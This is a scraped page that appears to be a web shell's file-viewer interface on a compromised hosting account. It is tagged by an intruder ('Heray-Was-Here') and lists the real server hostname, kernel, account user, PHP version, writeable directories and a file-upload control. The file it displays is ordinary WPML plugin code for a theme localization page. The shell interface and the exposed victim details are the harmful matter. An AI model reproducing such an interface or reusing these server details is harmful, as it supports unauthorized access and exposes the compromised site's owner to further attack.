Heray-Was-Here
Server : Apache
System : Linux hybrid3195.ca.ns.planethoster.net 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User : alliancerealtynb ( 1004)
PHP Version : 7.4.33
Disable Function : noop
Directory :  /home/alliancerealtynb/sitepress-multilingual-cmsOLDOLD/menu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/alliancerealtynb/sitepress-multilingual-cmsOLDOLD/menu/theme-localization.php
<?php
global $sitepress;

if ( ( ! isset( $sitepress_settings['existing_content_language_verified'] ) ||
	  ! $sitepress_settings['existing_content_language_verified'] ) ||
	  2 > count( $sitepress->get_active_languages() ) ) {
	return;
}

?>

<div class="wrap">
	<h2><?php _e( 'Theme and plugins localization', 'sitepress' ); ?></h2>

	<div id="wpml-mo-scan-localization-page"></div>

	<?php

	/** @deprecated use wpml_custom_localization_type instead */
		do_action( 'icl_custom_localization_type' );

		do_action( 'wpml_custom_localization_type' );
	?>

	<?php do_action( 'icl_menu_footer' ); ?>
</div>

Hry